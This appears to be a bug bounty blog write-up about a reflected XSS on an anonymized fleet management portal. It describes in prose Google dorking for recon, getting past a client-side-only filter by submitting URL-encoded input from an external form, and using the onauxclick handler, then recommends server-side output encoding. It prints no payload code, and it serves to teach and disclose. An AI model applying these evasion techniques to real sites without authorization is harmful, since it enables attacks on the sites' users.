Disclosure: This vulnerability has been resolved by the program. No company names, specific domains, or reproduction steps that could identify the target are included in this write-up. All research was conducted within an authorized bug bounty program.
Starting Point: Google Dorking for Attack Surface
I wasn’t handed this target — I found it. That’s how most of my sessions start: with reconnaissance before I’ve even decided what to test.
Google dorking is underrated as a first step. Most hunters go straight to subdomain enumeration, but the search index has already crawled things that your tooling might miss — legacy portals, forgotten subdomains, publicly indexed forms. A well-crafted site: query combined with inurl:search or inurl:query is often enough to surface interesting input vectors fast.
That’s exactly what happened here. A dorking session surfaced a search function on a fleet management portal — a web application that, based on its content and structure, was clearly handling real business users. The kind of target where XSS isn’t just a theoretical risk.
The Filter: A False Sense of Security
The search field had client-side validation. Submit anything with special characters — quotes, angle brackets, angle brackets, angle brackets — and you’d get a friendly alert: only alphanumeric characters are allowed.
This is where a lot of testers stop. They see the error, note it as “input validation in place,” and move on.
I saw it as a starting hypothesis: what is this filter actually checking, and where?
Client-side filters are enforced in the browser. They are not enforced on the server. The moment you bypass the browser’s gatekeeping — by crafting a request directly, modifying form data, or encoding the payload — the server sees whatever you send it, and it either handles it safely or it doesn’t.
The Bypass: URL Encoding
The filter was checking the raw string value of the input field. It wasn’t checking what that string decoded to on the server side.
URL encoding substitutes special characters for their percent-encoded equivalents. A double quote " becomes %22. An equals sign = becomes %3d. The browser renders these as the original characters when processing the response — but the client-side filter never sees them as special characters at all, because it’s checking the encoded string.
By submitting a URL-encoded XSS payload through a crafted POST request rather than typing directly into the field, I bypassed the filter entirely. The server accepted the input, reflected it back in the response, and the browser decoded and rendered the payload as intended.
The key to making this work in practice was building an external HTML form that submitted the encoded payload directly to the target’s search endpoint via POST — removing the browser’s input field from the equation entirely. This is a standard technique for testing server-side handling independent of client-side controls.
The Self-XSS Challenge
After initial triage, I received a reasonable question from the program: can you prove this isn’t self-XSS?
Self-XSS is a class of “vulnerability” where you can only execute script in your own browser session — for example, by pasting a payload into your own browser console. It has no real-world impact because you can’t trick someone else into triggering it. Programs rightfully push back on these.
My initial proof-of-concept relied on a trigger that only fired when the user interacted directly with the search field. I needed to demonstrate that an unwitting third party could be made to trigger the payload without knowing it.
The answer was the onauxclick event handler.
onauxclick fires when a user right-clicks or middle-clicks an element. It’s an event handler that most developers don’t think about hardening against — it doesn’t appear in the standard lists of XSS event handlers, and it’s not something sanitization libraries always strip. Critically, right-clicking is a completely natural user action — it doesn’t require the victim to type anything or take any unusual step.
By injecting onauxclick as the event handler in my payload, I showed that any user who visited the crafted URL and simply right-clicked in the search area would trigger script execution — entirely without intent, and entirely under attacker control.
That updated proof-of-concept was enough. The report was escalated to triaged.
What Made This Work
Three independent factors came together:
Client-side-only validation. The filter lived in the browser, not on the server. Any mechanism that can be bypassed by crafting a request outside the browser is not a security control — it’s a UX feature.
Reflected input without server-side encoding. The search term was echoed back into the page response without proper output encoding. The server trusted the input it received. If the server had HTML-encoded the reflected value before inserting it into the page, the payload would have rendered as harmless text.
An overlooked event handler. onauxclick isn’t onclick. Developers auditing for XSS tend to focus on the obvious handlers. Less common event handlers — onauxclick, onpointerdown, onformdata, and others — can slip through filters that are pattern-matching against a known-bad list rather than applying structural sanitization.
Mitigation
The right fix isn’t a better client-side filter — it’s output encoding on the server. Any value that originates from user input and gets inserted into an HTML response needs to be properly encoded at the point of insertion, using structured mechanisms rather than manual pattern-matching.
CWE-79 (Improper Neutralization of Input During Web Page Generation) describes this class of vulnerability well. The root cause is never the input itself — it’s the output handling.
Takeaway
Filter bypass isn’t always about clever obfuscation. Sometimes it’s simply about asking: where does this filter actually run, and what does the server see instead?
If the answer is “the server sees the raw value after decoding,” and the server reflects that value into the page without encoding it — you have your path.
The recon that found this target took minutes. The filter bypass took minutes. The lesson: client-side validation that isn’t backed by server-side sanitization is not a security control. It’s a speed bump.